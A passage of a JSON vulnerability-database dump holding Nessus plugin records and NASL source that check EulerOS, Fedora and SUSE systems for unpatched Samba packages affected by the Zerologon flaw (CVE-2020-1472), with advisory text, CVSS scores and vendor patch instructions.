rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-libs-python3-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-lp151.2.33.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-pcp-pmda / ctdb-pcp-pmda-debuginfo / etc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T09:06:34", "description": "According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 4, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-10-09T00:00:00", "title": "EulerOS : samba (EulerOS-SA-2020-2181)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-10-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:samba-winbind-clients", "p-cpe:/a:huawei:euleros:libsmbclient", "p-cpe:/a:huawei:euleros:samba-winbind", "p-cpe:/a:huawei:euleros:samba", "p-cpe:/a:huawei:euleros:samba-common", "p-cpe:/a:huawei:euleros:samba-winbind-modules", "p-cpe:/a:huawei:euleros:samba-libs", "p-cpe:/a:huawei:euleros:samba-common-tools", "p-cpe:/a:huawei:euleros:samba-client", "p-cpe:/a:huawei:euleros:libwbclient", "cpe:/o:huawei:euleros:"], "id": "EULEROS_SA-2020-2181.NASL", "href": "https://www.tenable.com/plugins/nessus/141331", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141331);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2020-1472\"\n );\n\n script_name(english:\"EulerOS : samba (EulerOS-SA-2020-2181)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the samba packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - An elevation of privilege vulnerability exists when an\n attacker establishes a vulnerable Netlogon secure\n channel connection to a domain controller, using the\n Netlogon Remote Protocol (MS-NRPC), aka 'Netlogon\n Elevation of Privilege Vulnerability'.(CVE-2020-1472)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2020-2181\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a6b24497\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libsmbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:libwbclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-common-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-clients\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:samba-winbind-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release (\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS \");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"libsmbclient-4.11.6-6.h8.eulerosv2r9\",\n \"libwbclient-4.11.6-6.h8.eulerosv2r9\",\n \"samba-4.11.6-6.h8.eulerosv2r9\",\n \"samba-client-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-4.11.6-6.h8.eulerosv2r9\",\n \"samba-common-tools-4.11.6-6.h8.eulerosv2r9\",\n \"samba-libs-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-clients-4.11.6-6.h8.eulerosv2r9\",\n \"samba-winbind-modules-4.11.6-6.h8.eulerosv2r9\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T06:14:21", "description": "Update to Samba 4.13.0\n\n----\n\nSecurity fixes for CVE-2020-1472\n\n----\n\nUpdate to Samba 4.13.0rc4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 2, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-10-08T00:00:00", "title": "Fedora 33 : 2:samba (2020-77c15664b0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-10-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:2:samba", "cpe:/o:fedoraproject:fedora:33"], "id": "FEDORA_2020-77C15664B0.NASL", "href": "https://www.tenable.com/plugins/nessus/141273", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2020-77c15664b0.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(141273);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/12\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"FEDORA\", value:\"2020-77c15664b0\");\n\n script_name(english:\"Fedora 33 : 2:samba (2020-77c15664b0)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Update to Samba 4.13.0\n\n----\n\nSecurity fixes for CVE-2020-1472\n\n----\n\nUpdate to Samba 4.13.0rc4\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2020-77c15664b0\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected 2:samba package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:33\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/10/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^33([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 33\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC33\", reference:\"samba-4.13.0-11.fc33\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:samba\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-14T06:30:14", "description": "This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 3, "cvss3": {"score": 10.0, "vector": "AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"}, "published": "2020-12-09T00:00:00", "title": "SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-1472"], "modified": "2020-12-09T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-errors0", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo"], "id": "SUSE_SU-2020-2724-1.NASL", "href": "https://www.tenable.com/plugins/nessus/143807", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:2724-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(143807);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/13\");\n\n script_cve_id(\"CVE-2020-1472\");\n\n script_name(english:\"SUSE SLES12 Security Update : samba (SUSE-SU-2020:2724-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for samba fixes the following issues :\n\nZeroLogon: An elevation of privilege was possible with some\nconfigurations when an attacker established a vulnerable Netlogon\nsecure channel connection to a domain controller, using the Netlogon\nRemote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1176579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-1472/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20202724-1\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5a60bae9\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 7 :\n\nzypper in -t patch SUSE-OpenStack-Cloud-7-2020-2724=1\n\nSUSE Linux Enterprise Server for SAP 12-SP2 :\n\nzypper in -t patch SUSE-SLE-SAP-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-LTSS :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-2020-2724=1\n\nSUSE Linux Enterprise Server 12-SP2-BCL :\n\nzypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2020-2724=1\n\nSUSE Linux Enterprise High Availability 12-SP2 :\n\nzypper in -t patch SUSE-SLE-HA-12-SP2-2020-2724=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc-binding0-debuginfo-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"libdcerpc0-debuginfo-32bit-4.4.2-38.36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", 